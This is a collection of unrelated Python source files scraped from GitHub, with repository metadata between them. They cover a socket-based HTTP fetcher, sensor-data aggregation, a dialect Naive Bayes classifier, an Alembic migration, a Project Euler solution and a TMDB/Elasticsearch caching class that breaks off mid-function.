if (re.match("[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}", rawr)):
neededInfo['sName'] = cmd_input[1]
neededInfo['sIp'] = rawr
else:
neededInfo['sName'] = rawr
neededInfo['sIp'] = cmd_input[1]
# setting path
rawr = parsed.group('path')
path_empty = False
if(rawr == None):
path_empty = True
if(path_empty == True):
neededInfo['Path'] = "/"
else:
neededInfo['Path'] = rawr
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#start connection between source and and host
sock.connect((neededInfo['sIp'], neededInfo['sPort']))
sock.settimeout(TIMEOUT_SIZE)
neededInfo['cIp'], neededInfo['cPort'] = sock.getsockname() #gets cip and cport
request = "GET {} HTTP/1.1\r\nHost:{}\r\n\r\n".format(neededInfo['Path'], neededInfo['sName'])
sock.send(request.encode()) #changing request (type string) need to encode to a byte
#if the port is bad, we print to our Log file with the respective parameters
if(port_true == True):
log = "Unsuccessful, 56, {}, {}, {}, {}, {}, {}, [Errno 54] Connection reset by peer\n\n".format(url,
neededInfo['sName'], str(neededInfo['cIp']), str(neededInfo['sIp']), str(neededInfo['cPort']),
str(neededInfo['sPort']))
f = open("Log.csv", "a")
f.write(log)
f.close()
sys.exit("Port not supported")
#get the header
neededInfo['msg'] = ""
try:
while True:
pack = sock.recv(1) #getting one byte
if("\r\n\r" in neededInfo['msg'] or pack == None): #see \r\n\r signals the end of the header file
break
neededInfo['msg'] = neededInfo['msg'] + pack.decode()
except:
sock.close()
sys.exit("Could not receieved information from message.")
msg_true = re.search(r"Content-Length: (\d+)",neededInfo['msg']) #get content length
msg_exists = False
if(msg_true != None):
msg_true = int(msg_true.group(1))-len(neededInfo['msg'].encode())
msg_exists = True
#get the rest of the message in html format if it exists
neededInfo['html_msg'] = ""
if(msg_exists == True):
try:
while True:
pack = sock.recv(BUFF_SIZE)
len_size = False
if (len(pack) == BUFF_SIZE):
len_size = True
if (len_size == False):
neededInfo['html_msg'] = neededInfo['html_msg']+ pack.decode()
break
neededInfo['html_msg'] = neededInfo['html_msg']+ pack.decode()
except Exception as e:
sock.close()
sys.exit("Could not receieved information from message.")
# http_out = http_out + pack.decode()
# neededInfo['html_msg'] = neededInfo['html_msg']+ pack.decode()
sock.close()
#set stattus based on above
http_status = re.search(r"(HTTP/.*)?", neededInfo['msg']).group(1)
#print the html content into my httpoutput.html file
f = open("HTTPoutput.html", "w")
f.write(neededInfo['html_msg'])
f.close()
#print to my log file with respective parameters
log = ""
print_message = ""
status_code = re.search(r"HTTP/\d{1}.?\d? (\d*)? \w+", http_status).group(1)
success = True
if(status_code != '200'):
success = False
if(success == True):
run_status = "Successful"
if(success == False):
run_status = "Unsuccessful"
term_out = run_status + " " + url + " " + http_status
print(term_out)
if "chunked" in neededInfo['msg']:
print("ERROR: Chunk encoding is not supported")
log = log +run_status + " "
log = log+ status_code + " "
log = log+ url + " "
log = log+ neededInfo['sName'] + " "
log = log+ str(neededInfo['cIp']) + " "
log = log+ str(neededInfo['sIp']) + " "
log = log+ str(neededInfo['cPort']) + " "
log = log+ str(neededInfo['sPort']) + " "
log = log+ http_status
log = log + "\n\n"
f = open("Log.csv", "a")
f.write(log)
f.close()
|
kelly8282/python-stuff
|
kliu80MyCurl_2_1.py
|
kliu80MyCurl_2_1.py
|
py
| 6,029 |
python
|
en
|
code
| 0 |
github-code
|
6
|
26867008715
|
import numpy as np
import pandas as pd
def drop_first_rows(data):
"""
The first rows of many JOBNUMs, where many strings enter the machine and no
ladders leave contain strange readings that are unrepresentative of the data
as a whole. If called, this function will drop them.
"""
indices = data.loc[data.loc[:, '0103 ID'] == 1].index
return data.drop(indices, axis=0)
def calc_time_delta_last_ladder_out(sensor_data):
"""
For each row of the sensor data, the time difference is calculated between
that row and when the last ladder left the machine
"""
condition = sensor_data['0103 ID'] != sensor_data['prev_0103 ID']
sensor_data['0103 ID Start'] = sensor_data.loc[condition, 'Date']
groupby = sensor_data.groupby('JOBNUM')
sensor_data['0103 ID Start'] = groupby['0103 ID Start'].fillna(method='ffill')
sensor_data['Time Since Last 0103'] = (
sensor_data['Date'] - sensor_data['0103 ID Start']
).dt.total_seconds().astype(int)
return sensor_data
def deacs_roll(data, func, n, n_rows_back=30):
"""
Groups on JOBNUM and for each deactivation looks back
a maximum of n_rows_back and sums the number of pace-ins
longer than n
"""
groupby = data.groupby('JOBNUM')
return groupby.apply(func, n, n_rows_back)\
.reset_index(drop=True)
def return_all_n_rows_before_every_deactivation(data, n, n_rows_back):
"""
Iterates through each pace >= n ID in each JOBNUM and returns
all n rows before every deactivation as one dataframe
"""
n_rows_back += 1
condition = (data[f'0102 Pace >= {n} ID'] >= 1) & \
(data['Label'] == 1)
ids = data.loc[condition, :]
if len(ids.index) > 0:
for index, row in ids.iterrows():
"""
check whether there are less than n_rows_back before the
0102 pace >= n ID
"""
zero = data.index[0]
if index - n_rows_back >= zero:
sliced = data.loc[index - n_rows_back - 1:index, '0102 Pace']
else:
sliced = data.loc[data.index[0]:index, '0102 Pace']
if 'pace' in locals():
pace = pd.concat([pace, sliced], axis=0, sort=False)
else:
pace = sliced
return pace
def sum_num_pace_ins_larger_than_n(data, n, n_rows_back):
"""
Iterates through each pace >= n ID in each JOBNUM and calculates how many
pace >= n occured n_rows_back
"""
ids = data.loc[data[f'0102 Pace >= {n} ID'] >= 1, :]
for index, row in ids.iterrows():
"""
check whether there are less than n_rows_back before the
0102 pace >= n ID
"""
if index - n_rows_back >= data.index[0]:
sliced = data.loc[index - n_rows_back:index, :]
else:
sliced = data.loc[data.index[0]:index, :]
data.loc[index, f'0102 Sum Pace >= {n}'] = sliced\
.aggregate({f'0102 Pace >= {n} Count': 'sum'})\
.squeeze()
return data
def sum_non_deac_pace_ins_larger_than_n(data, n, n_rows_back):
"""
Iterates through each pace >= n ID in each JOBNUM and calculates how many
pace >= n occured n_rows_back
"""
ids = data.loc[data[f'0102 Pace >= {n} ID'] >= 1, :]
for index, row in ids.iterrows():
"""
check whether there are less than n_rows_back before the
0102 pace >= n ID
"""
if index - n_rows_back >= data.index[0]:
sliced = data.loc[index - n_rows_back:index, :]
else:
sliced = data.loc[data.index[0]:index, :]
sliced = sliced[sliced['Label'] == 0]
data.loc[index, f'0102 Sum Pace ND >= {n}'] = sliced\
.aggregate({f'0102 Pace >= {n} Count': 'sum'})\
.squeeze()
return data
|
Danavell/Dolle
|
pre_processing/aggregate_0102/aggregates.py
|
aggregates.py
|
py
| 3,892 |
python
|
en
|
code
| 0 |
github-code
|
6
|
22534790497
|
#Program for a Function that takes a list of words and returns the length of the longest one.
def longest_word(list): #define a function which takes list as a parameter
longest=0
for words in list: #loop for each word in list
if len(words)>longest: #compare length iteratively
longest=len(words)
lword=words
return lword #return longest word
w=['Entertainment','entire','Elephant','inconsequential']
print("Longest word is",longest_word(w), "with", len(longest_word(w)), "letters.")
|
ABHISHEKSUBHASHSWAMI/String-Manipulation
|
str8.py
|
str8.py
|
py
| 704 |
python
|
en
|
code
| 1 |
github-code
|
6
|
42514144175
|
import math
import nltk
nltk.download('stopwords')
import pandas as pd
import re
from copy import deepcopy
from dictionary.models import Dialect
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from django.shortcuts import render, redirect
class NaiveBayes:
def split_reg(self, *args):
sentence = self.lower()
new = ' '.join([word for word in re.split(r'[^A-Za-z]', sentence) if word])
return new
def split_word(new):
stop_words_lst = set(stopwords.words("english"))
stop_words_lst.update (('ako','ang','amua','ato','busa','ikaw','ila','ilang','imo','imong','iya','iyang','kaayo','kana',
'kaniya','kaugalingon','kay','kini','kinsa','kita','lamang','mahimong','mga','mismo','nahimo'
,'nga','pareho','pud','sila','siya','unsa','sa','ug','nang', 'ng','diay', 'atu', 'mo'))
sentence = new.lower()
new_str = ' '.join([word for word in sentence.split(' ') if word not in stop_words_lst])
return new_str
def train_waray(new_str):
waray_count = Dialect.objects.filter(dialect='Waray').count()
doc_count = Dialect.objects.count()
warays = Dialect.objects.filter(dialect='Waray')
sentence = new_str.lower()
user_inputs = sentence.split(' ')
war_count = 1
for waray in warays:
for user_input in user_inputs:
if waray.word == user_input:
war_count *= (1 + 1) / (waray_count + doc_count)
return war_count
def train_cebuano(new_str):
cebu_count = Dialect.objects.filter(dialect='Cebuano').count()
doc_count = Dialect.objects.count()
cebus = Dialect.objects.filter(dialect='Cebuano')
sentence = new_str.lower()
user_inputs = sentence.split(' ')
ceb_count = 1
for cebu in cebus:
for user_input in user_inputs:
if cebu.word == user_input:
ceb_count *= (1 + 1) / (cebu_count + doc_count)
return ceb_count
def train_hiligaynon(new_str):
hili_count = Dialect.objects.filter(dialect='Hiligaynon').count()
doc_count = Dialect.objects.count()
hiligs = Dialect.objects.filter(dialect='Hiligaynon')
sentence = new_str.lower()
user_inputs = sentence.split(' ')
hil_count = 1
for hilig in hiligs:
for user_input in user_inputs:
if hilig.word == user_input:
hil_count *= (1 + 1) / (hili_count + doc_count)
return hil_count
def smooth_waray(new_str):
waray_count = Dialect.objects.filter(dialect='Waray').count()
doc_count = Dialect.objects.count()
sentence = new_str.lower()
user_inputs = sentence.split(' ')
smooth_war = 1
for items in user_inputs:
if Dialect.objects.filter(word=items, dialect='Waray').exists():
pass
else:
smooth_war *= 1 / (waray_count + doc_count)
return smooth_war
def smooth_cebuano(new_str):
cebu_count = Dialect.objects.filter(dialect='Cebuano').count()
doc_count = Dialect.objects.count()
sentence = new_str.lower()
user_inputs = sentence.split(' ')
smooth_ceb = 1
for items in user_inputs:
if Dialect.objects.filter(word=items, dialect='Cebuano').exists():
pass
else:
smooth_ceb *= 1 / (cebu_count + doc_count)
return smooth_ceb
def smooth_hiligaynon(new_str):
hili_count = Dialect.objects.filter(dialect='Hiligaynon').count()
doc_count = Dialect.objects.count()
sentence = new_str.lower()
user_inputs = sentence.split(' ')
smooth_hil = 1
for items in user_inputs:
if Dialect.objects.filter(word=items, dialect='Hiligaynon').exists():
pass
else:
smooth_hil *= 1 / (hili_count + doc_count)
return smooth_hil
def multi_words(war_count, ceb_count, hil_count, smooth_war, smooth_ceb, smooth_hil):
waray_count = Dialect.objects.filter(dialect='Waray').count()
cebu_count = Dialect.objects.filter(dialect='Cebuano').count()
hili_count = Dialect.objects.filter(dialect='Hiligaynon').count()
doc_count = Dialect.objects.count()
priorLogWar = waray_count/doc_count
priorLogCeb = cebu_count/doc_count
priorLogHil = hili_count/doc_count
war_val = 0
ceb_val = 0
hil_val = 0
if war_count == 1:
war_val *= war_count
else:
war_val = war_count * smooth_war * priorLogWar
if ceb_count == 1:
ceb_val *= ceb_count
else:
ceb_val = ceb_count * smooth_ceb * priorLogCeb
if hil_count == 1:
hil_val *= hil_count
else:
hil_val = hil_count * smooth_hil * priorLogHil
if war_val > ceb_val and war_val > hil_val:
return 'Waray'
elif ceb_val > war_val and ceb_val > hil_val:
return 'Cebuano'
elif hil_val > war_val and hil_val > ceb_val:
return 'Hiligaynon'
elif war_val and ceb_val and hil_val == 0:
return 'Word does not exist'
|
eymkarla/thesisrepo
|
classifier/NB.py
|
NB.py
|
py
| 4,535 |
python
|
en
|
code
| 0 |
github-code
|
6
|
6017738646
|
import bisect
l = [1, 2, 3, 4]
# 先找索引 再插入
index = bisect.bisect_left(l, 5)
l.insert(index, 5)
print(l) # Output: [1, 2, 3, 4, 5]
# 直接插入
bisect.insort_left(l, 6)
print(l) # Output: [1, 2, 3, 4, 5,6]
# 示例 查找分数等级
def grade(score, breakpoints=[60, 70, 80, 90], grades='FDCBA'):
i = bisect.bisect(breakpoints, score)
return grades[i]
g = [33, 99, 77, 70, 89, 90, 100]
[grade(score) for score in g] # ['F', 'A', 'C', 'C', 'B', 'A', 'A']
|
Yuelioi/Program-Learning
|
Python/Basic/标准库/07.数据类型/_bisect.py
|
_bisect.py
|
py
| 488 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27055792799
|
"""empty message
Revision ID: 22771e69d10c
Revises: 8c7cbf0f76c6
Create Date: 2021-07-14 18:46:48.994109
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "22771e69d10c"
down_revision = "8c7cbf0f76c6"
branch_labels = None
depends_on = None
def upgrade():
op.drop_constraint("participant_github_key", "participant", type_="unique")
op.alter_column(
"user", "username", existing_nullable=False, new_column_name="github_username"
)
op.add_column("user", sa.Column("first_name", sa.String(length=50), nullable=True))
op.add_column("user", sa.Column("last_name", sa.String(length=50), nullable=True))
op.add_column("user", sa.Column("email", sa.String(length=200), nullable=True))
op.add_column("user", sa.Column("phone", sa.String(length=13), nullable=True))
op.add_column("user", sa.Column("slack", sa.String(length=21), nullable=True))
op.add_column("user", sa.Column("is_admin", sa.Boolean(), nullable=True))
op.create_unique_constraint(None, "user", ["github_username"])
op.alter_column(
"participant",
"github",
nullable=False,
new_column_name="github_username",
server_default=None,
)
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint(None, "user", type_="unique")
op.create_unique_constraint("user_username_key", "user", ["username"])
op.drop_column("user", "is_admin")
op.drop_column("user", "slack")
op.drop_column("user", "phone")
op.drop_column("user", "email")
op.drop_column("user", "last_name")
op.drop_column("user", "first_name")
op.drop_constraint(None, "participant", type_="unique")
op.alter_column(
"user", "github_username", nullable=False, new_column_name="username"
)
op.alter_column(
"participant",
"github_username",
existing_nullable=False,
new_column_name="github",
)
# ### end Alembic commands ###
|
CodeForPoznan/codeforpoznan.pl_v3
|
backend/migrations/versions/22771e69d10c_.py
|
22771e69d10c_.py
|
py
| 2,028 |
python
|
en
|
code
| 8 |
github-code
|
6
|
42519865803
|
# The radical of n, rad(n), is the product of distinct prime factors of n. For
# example, 504 = 2^3 x 3^2 x 7, so rad(504) = 2 x 3 x 7 = 42.
#
# We shall define the triplet of positive integers (a, b, c) to be an abc-hit if:
# GCD(a, b) = GCD(a, c) = GCD(b, c) = 1
# a < b
# a + b = c
# rad(abc) < c
# For example, (5, 27, 32) is an abc-hit, because:
# GCD(5, 27) = GCD(5, 32) = GCD(27, 32) = 1
# 5 < 27
# 5 + 27 = 32
# rad(4320) = 30 < 32
# It turns out that abc-hits are quite rare and there are only thirty-one abc
# hits for c < 1000, with sum(c) = 12523.
#
# Find sum(c) for c < 120000.
from fractions import gcd
from euler.utils import Utils
u = Utils()
def hit(a, b, c, rad):
cond_1 = gcd(b, c) == 1
cond_2 = rad[a] * rad[b] * rad[c] < c
return cond_1 and cond_2
def rad(n, primes):
"""
creates an array of rad(n) for all values < n using dp
and a precalculated set of primes.
"""
l = [0, 1]
i = 2
while i < n:
n_ = i
if n_ in primes:
l.append(n_)
else:
for p in primes:
if n_ % p != 0:
continue
while n_ % p == 0:
n_ /= p
if n_ < len(l):
l.append(p * l[int(n_)])
break
i += 1
return l
def p127(max_c, exp):
primes = u.sieve(max_c)
radicals = rad(int(max_c), primes)
possible_ys = [i for i in range(1, max_c) if radicals[i] <= int(max_c ** exp)]
possible_rads = [radicals[i] for i in possible_ys]
print("len(radicals):", len(radicals))
print("len(possible_ys):", len(possible_ys))
print(possible_ys)
print(possible_rads)
total = 0
for a in possible_ys:
for b in possible_ys:
c = a + b
if a < b and c < max_c and hit(a, b, c, radicals):
print(a,b,c)
total += c
return total
print(p127(120000, 0.8))
|
jose-ramirez/project_euler
|
problems/p127.py
|
p127.py
|
py
| 2,025 |
python
|
en
|
code
| 0 |
github-code
|
6
|
19400321799
|
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
from common.linkedListCommon import *
class Solution:
def swapPairs(self, head: ListNode) -> ListNode:
dummy = ListNode(0)
dummy.next = head
cur = dummy
while cur.next and cur.next.next:
n1 = cur.next
n2 = cur.next.next
cur.next = n2
n1.next = n2.next
n2.next = n1
cur = n1
return dummy.next
head = generateLinkedList([1,2,3,4])
s = Solution().swapPairs(head)
|
Yigang0622/LeetCode
|
swapPairs.py
|
swapPairs.py
|
py
| 614 |
python
|
en
|
code
| 1 |
github-code
|
6
|
6433666492
|
import logging
import requests
import elasticsearch
import datetime
import os
import re
from .config import set_defaults
from jinja2 import Template
class ElasticTMDB(object):
def load_config(self):
set_defaults(self)
# Set HTTP headers for TMDB requests
self.headers = {}
self.headers["content-type"] = "application/json;charset=utf-8"
self.headers["Accept-Encoding"] = "gzip"
if not self.config["extra_logging"]:
logging.getLogger("elasticsearch").setLevel(logging.WARNING)
logging.getLogger("urllib3").setLevel(logging.WARNING)
logging.getLogger("requests").setLevel(logging.WARNING)
# ElasticSearch
elasticAuth = (self.config["es_username"], self.config["es_password"])
self.es = elasticsearch.Elasticsearch(hosts=self.config["es_host"],
port=self.config["es_port"],
scheme=self.config["es_scheme"],
http_auth=elasticAuth)
# Generate Index names and create them if they do not exists
self.config["title_index"] = "{}_{}_title".format(self.config["index_prefix"], self.config["title_type"])
self.config["search_index"] = "{}_{}_search".format(self.config["index_prefix"], self.config["title_type"])
self.check_index(indexName=self.config["title_index"], indexMappingFile="title.json")
self.check_index(indexName=self.config["search_index"], indexMappingFile="search.json")
# Get countries, generes, background base URL and languages from TMDB
if self.config["initial_cache_tmdb"]:
self.cache_configuration()
else:
logging.debug("Skipping Initial TMDB config...some functions might break")
def load_template(self, templateFile):
with open(os.path.join(os.path.dirname(__file__), "templates", templateFile), "r") as templateFile:
return Template(templateFile.read())
def send_request_get(self, endPoint=None, params=None):
if not params:
params = {}
if "language" not in params:
params["language"] = self.config["main_language"]
elif params["language"] == "":
del params["language"]
params["api_key"] = self.config["tmdb_api_key"]
if endPoint:
response = requests.get("https://api.themoviedb.org/3/{}".format(endPoint), params=params, headers=self.headers)
if response:
if response.status_code < 400:
return response.json()
else:
logging.error("Error Code {} - Message {}".format(response.status_code, response.json()["status_message"]))
del params["api_key"]
logging.error("Error Endpoint {} - Params {}".format(endPoint, params))
return None
else:
logging.error("Error Code {} - Message {}".format(response.status_code, response.json()["status_message"]))
del params["api_key"]
logging.error("Error Endpoint {} - Params {}".format(endPoint, params))
return None
def discover_title(self, page):
params = {}
params["sort_by"] = "popularity.desc"
params["page"] = page
discover = self.send_request_get(endPoint="discover/{}".format(self.config["title_type"]), params=params)
if discover:
return discover["results"]
def cache_title(self, title, force, record):
recordId = None
# Check if record exists in elasticsearch
if not record:
query = {"query": {"term": {"ids.tmdb": title["id"]}}}
esRecord = self.get_record_by_query(index=self.config["title_index"], query=query)
if esRecord["hits"]["hits"]:
recordId = esRecord["hits"]["hits"][0]["_id"]
record = esRecord["hits"]["hits"][0]["_source"]
else:
recordId = record["_id"]
esRecord = {"hits": {"hits": [record]}}
record = record["_source"]
if record:
# Check if record is up for an update
if self.check_update_required(timestamp=record["@timestamp"]):
force = True
if not recordId or force:
# Get details of title
params = {}
if title["original_language"] == self.config["exception_language"]:
params["language"] = self.config["exception_language"]
else:
params["language"] = self.config["main_language"]
title = self.send_request_get(endPoint="{}/{}".format(self.config["title_type"], title["id"]), params=params)
if title:
# Get title year, to be used for display
if not title.get(self.attrib["date"]):
titleYear = "None"
else:
titleYear = title[self.attrib["date"]][:4]
if recordId:
logging.info("Updating details : {} ({}) ({})".format(title.get(self.attrib["title"], "N/A"), titleYear, self.config["title_type"]))
else:
logging.info("Getting details : {} ({}) ({})".format(title.get(self.attrib["title"], "N/A"), titleYear, self.config["title_type"]))
# Add langauge if not in record
if "language" not in record:
record["language"] = title["original_language"]
# Add title if not in record
if "title" not in record:
record["title"] = title[self.attrib["title"]]
# Add country if not in record
if "country" not in record:
record["country"] = []
if "production_countries" in title:
for country in title["production_countries"]:
if country["iso_3166_1"] not in record["country"]:
record["country"].append(country["iso_3166_1"])
if "origin_country" in title:
for country in title["origin_country"]:
if country not in record["country"]:
record["country"].append(country)
# Add rating and number of votes
if "rating" not in record:
record["rating"] = {}
record["rating"]["tmdb"] = {}
record["rating"]["tmdb"]["votes"] = title["vote_count"]
record["rating"]["tmdb"]["average"] = title["vote_average"]
# Add original title to aliases if different
if "alias" not in record:
record["alias"] = []
if title[self.attrib["title"]] != title[self.attrib["original_title"]]:
if self.check_for_dup(title[self.attrib["original_title"]], record["alias"], record["title"]):
record["alias"].append(title[self.attrib["original_title"]])
# Release year
if "year" not in record:
record["year"] = None
if title[self.attrib["date"]] != "None":
if title[self.attrib["date"]]:
record["year"] = int(title[self.attrib["date"]][:4])
# Get genres
if "genre" not in record:
record["genre"] = []
for genre in title["genres"]:
if genre["id"] not in record["genre"]:
record["genre"].append(genre["id"])
# Get cast, director and other crew
if "credits" not in record:
record["credits"] = {}
cast = self.send_request_get(endPoint="{}/{}/credits".format(self.config["title_type"], title["id"]))
# Save top 10 cast
for person in sorted(cast["cast"], key=lambda k: (k["order"])):
if "actor" not in record["credits"]:
record["credits"]["actor"] = []
if len(record["credits"]["actor"]) < 10:
if self.check_for_dup(person["name"], record["credits"]["actor"]):
record["credits"]["actor"].append(person["name"])
# Save director and 5 other members of crew (producers etc)
for person in cast["crew"]:
if person["job"] == 'Director':
if "director" not in record["credits"]:
record["credits"]["director"] = []
if self.check_for_dup(person["name"], record["credits"]["director"]):
record["credits"]["director"].append(person["name"])
else:
if "other" not in record["credits"]:
record["credits"]["other"] = []
if len(record["credits"]["other"]) < 5:
if self.check_for_dup(person["name"], record["credits"]["other"]):
record["credits"]["other"].append(person["name"])
# Get description (and only keep first paragraph) save it only if longer then record if present
if "overview" in title:
if "description" not in record:
record["description"] = ""
# Keep only first paragraph of overview
regex = re.search(r'^(.+?)\n\n', title["overview"])
if regex:
overview = regex.group(1)
else:
overview = title["overview"]
# Keep longer one
if len(overview) > len(record["description"]):
record["description"] = overview
# Save tagline if incoming one is longer
if "tagline" in title:
if "tagline" not in record:
record["tagline"] = ""
if len(record["tagline"]) > len(record["tagline"]):
record["tagline"] = title["tagline"]
# Get translations
translations = self.send_request_get(endPoint="{}/{}/translations".format(self.config["title_type"], title["id"]))
for translation in translations["translations"]:
if translation["iso_639_1"] in self.config["languages"]:
# Add Aliases
if self.check_for_dup(translation["data"][self.attrib["title"]], record["alias"], record["title"]):
record["alias"].append(translation["data"][self.attrib["title"]])
# Get alternative titles
altTitles = self.send_request_get(endPoint="{}/{}/alternative_titles".format(self.config["title_type"], title["id"]))
for titleName in altTitles[self.attrib["alt_titles"]]:
if titleName["iso_3166_1"] in self.config["countries"]:
if self.check_for_dup(titleName["title"], record["alias"], record["title"]):
record["alias"].append(titleName["title"])
# Get images not not is avaliable
if "image" not in record:
record["image"] = ""
if title["original_language"] == self.config["exception_language"]:
params = {"language": title["original_language"]}
else:
params = {"language": self.config["main_language"]}
images = self.send_request_get(endPoint="{}/{}/images".format(self.config["title_type"], title["id"]), params=params)
if not images["posters"] and not images["backdrops"]:
# Try to search without any language for art
images = self.send_request_get(endPoint="{}/{}/images".format(self.config["title_type"], title["id"]), params={"language": ""})
imageAspectRatio = 10
for image in images["posters"] + images["backdrops"]:
if abs(image["aspect_ratio"] - self.config["image_aspect_ratio"]) < abs(imageAspectRatio - self.config["image_aspect_ratio"]):
record["image"] = image["file_path"][1:]
imageAspectRatio = abs(imageAspectRatio - self.config["image_aspect_ratio"])
# Get TMDB Record IDs
if "ids" not in record:
record["ids"] = {}
if "tmdb" not in record["ids"]:
record["ids"]["tmdb"] = title["id"]
self.index_record(index=self.config["title_index"], recordId=recordId, record=record)
else:
logging.debug("No update required for {} ({}) ({})".format(esRecord["hits"]["hits"][0]["_source"]["title"], esRecord["hits"]["hits"][0]["_source"]["year"], self.config["title_type"]))
return record
def search_title(self, search):
# First query elasticsearch and check if title is returned without any additional caching
result = self.query_title(search=search)
# If no title has been returned, search by director and actors
if not result or search.get("force"):
crew = search.get("director", []) + search.get("actor", []) + search.get("other", [])
for person in crew:
self.search_person_tmdb(person=person, year=search.get("year"), force=search.get("force"))
# Query again in elasticsearch and if match then break
result = self.query_title(search=search)
if result:
break
# If no result found, search by name and year if avaliable
if not result or search.get("force"):
if "title" in search:
for title in search["title"]:
self.search_title_tmdb(title=title, year=search.get("year"), force=search.get("force"))
result = self.query_title(search=search)
# Try an exact match if no result yet
if not result:
if "title" in search:
result = self.query_title_exact(search=search)
# Try adjacent years if provided year is not a hit. This is a workaround as the year supplied by some providers is inaccurate
if not result:
if search.get("year"):
for yearDiff in range(0, self.config["year_diff"] + 1):
final = False
if yearDiff == self.config["year_diff"]:
final = True
result = self.query_title(search=search, yearDiff=yearDiff, final=final)
if result:
break
else:
result = self.query_title(search=search, final=True)
if result:
logging.debug("Found {} ({}) in elasticsearch (Score: {:.1f})".format(result["_source"]["title"], self.config["title_type"], result["_score"]))
result = self.process_result(result=result, force=search.get("force"))
return result
def query_title_exact(self, search):
query = {"from": 0, "size": 1, "query": {}}
query["query"]["bool"] = {}
query["query"]["bool"]["should"] = []
if "title" in search:
for title in search["title"]:
query["query"]["bool"]["should"].append({"multi_match": {"query": title, "fields": ["title.keyword", "alias.keyword"]}})
result = self.get_record_by_query(index=self.config["title_index"], query=query)
if result["hits"]["total"]["value"] > 0:
if result["hits"]["hits"][0]["_score"] >= self.config["min_score_exact"]:
return result["hits"]["hits"][0]
def query_title(self, search, final=False, yearDiff=0):
query = {"from": 0, "size": 1, "query": {}}
query["query"]["bool"] = {}
query["query"]["bool"]["must"] = []
query["query"]["bool"]["should"] = []
if "title" in search:
for title in search["title"]:
query["query"]["bool"]["should"].append({"multi_match": {"query": title, "fields": ["title", "alias"]}})
if "director" in search:
for director in search["director"]:
query["query"]["bool"]["should"].append({"match": {"credits.director": director}})
if "actor" in search:
for actor in search["actor"]:
query["query"]["bool"]["should"].append({"match": {"credits.actor": actor}})
if "other" in search:
for producer in search["other"]:
query["query"]["bool"]["should"].append({"match": {"credits.other": producer}})
if "country" in search:
for country in search["country"]:
countryCode = self.countryCodes.get(country)
if countryCode:
query["query"]["bool"]["should"].append({"match": {"country": countryCode}})
if "year" in search:
search["year"] = int(search["year"])
year = {}
year["bool"] = {}
year["bool"]["should"] = []
year["bool"]["should"].append({"range": {"year": {"gte": search["year"] - yearDiff, "lte": search["year"] + yearDiff}}})
query["query"]["bool"]["must"].append(year)
# Calculate min score
if not final:
minScore = self.config["min_score_no_search"]
else:
minScore = self.config["min_score"]
if "actor" in search:
minScore += len(search["actor"] * self.config["score_increment_per_actor"])
result = self.get_record_by_query(index=self.config["title_index"], query=query)
if result["hits"]["total"]["value"] > 0:
if result["hits"]["hits"][0]["_score"] >= minScore:
return result["hits"]["hits"][0]
if final:
logging.debug("Best result {} (Score: {:.1f} Min Score: {})".format(result["hits"]["hits"][0]["_source"]["title"], result["hits"]["hits"][0]["_score"], minScore))
else:
if final:
logging.debug("No results found for {}".format(search["title"][0]))
def process_result(self, result, force):
# Check if record requires updating
title = {"id": result["_source"]["ids"]["tmdb"], "original_language": result["_source"]["language"]}
result["_source"] = self.cache_title(title=title, force=force, record=result)
# Generate full image URL if missing
result["_source"]["image"] = self.get_image_url(image=result["_source"]["image"])
# Convert country code to full name
countries = []
for countryCode in result["_source"]["country"]:
countries.append(self.countries.get(countryCode, "Unknown"))
result["_source"]["country"] = countries
# Convert language code to full name
result["_source"]["language"] = self.languages.get(result["_source"]["language"], "Unknown")
# Convert genre code
genres = []
for genreId in result["_source"]["genre"]:
genre = self.genres.get(genreId)
if genre:
genres.append(self.genres[genreId])
if genres:
result["_source"]["genre"] = genres
return result
def search_person_tmdb(self, person, year, force):
performSearch = force
recordId = None
# Check if search was already performed
query = {"query": {"bool": {"must": []}}}
query["query"]["bool"]["must"].append({"term": {"person": person}})
query["query"]["bool"]["must"].append({"term": {"year": year or -1}})
result = self.get_record_by_query(index=self.config["search_index"], query=query)
if result["hits"]["total"]["value"] == 0:
performSearch = True
else:
# Check if person is up for an update:
if self.check_update_required(timestamp=result["hits"]["hits"][0]["_source"]["@timestamp"]):
performSearch = True
recordId = result["hits"]["hits"][0]["_id"]
if performSearch:
# Query TMDB for person
params = {"include_adult": "false", "page": 1}
params["query"] = person
logging.info("Searching for person : {}".format(person))
response = self.send_request_get("search/person", params=params)
if "total_results" in response:
if response["total_results"] > 0:
for personRecord in response["results"]:
# Search credits of person found
logging.info("Getting credits : {} ({}) ({})".format(personRecord["name"], year, self.config["title_type"]))
credits = self.send_request_get("person/{}/{}_credits".format(personRecord["id"], self.config["title_type"]))
# Find titles during years around query or if year=-1 all credits
if "crew" in credits:
for credit in credits["crew"] + credits["cast"]:
if "release_date" in credit and year:
if credit["release_date"] != '' and credit["release_date"]:
creditYear = int(credit["release_date"][:4])
if abs(year - creditYear) > self.config["year_diff"]:
continue
self.cache_title(title=credit, force=force, record={})
# Save that name and year to avoid doing the same search again
record = {}
record["person"] = person
record["year"] = year or -1
self.index_record(index=self.config["search_index"], record=record, recordId=recordId)
else:
logging.debug("Already searched credits for {} ({}) ({})".format(person, year, self.config["title_type"]))
def search_title_tmdb(self, title, year, force):
performSearch = force
recordId = None
# Check if search was already performed
query = {"query": {"bool": {"must": []}}}
query["query"]["bool"]["must"].append({"term": {"title": title}})
query["query"]["bool"]["must"].append({"term": {"year": year or -1}})
result = self.get_record_by_query(index=self.config["search_index"], query=query)
if result["hits"]["total"]["value"] == 0:
performSearch = True
else:
# Check if person is up for an update:
if self.check_update_required(timestamp=result["hits"]["hits"][0]["_source"]["@timestamp"]):
performSearch = True
recordId = result["hits"]["hits"][0]["_id"]
if performSearch:
params = {"include_adult": "false", "page": 1}
params["query"] = title
if year:
params["year"] = year
logging.info("Searching for title : {} ({}) ({})".format(title, year, self.config["title_type"]))
response = self.send_request_get(endPoint="search/{}".format(self.config["title_type"]), params=params)
if "total_results" in response:
if response["total_results"] > 0:
for result in response["results"][:5]:
self.cache_title(title=result, force=force, record={})
# Save title and year to avoid doing the same search again
record = {}
record["title"] = title
record["year"] = year or -1
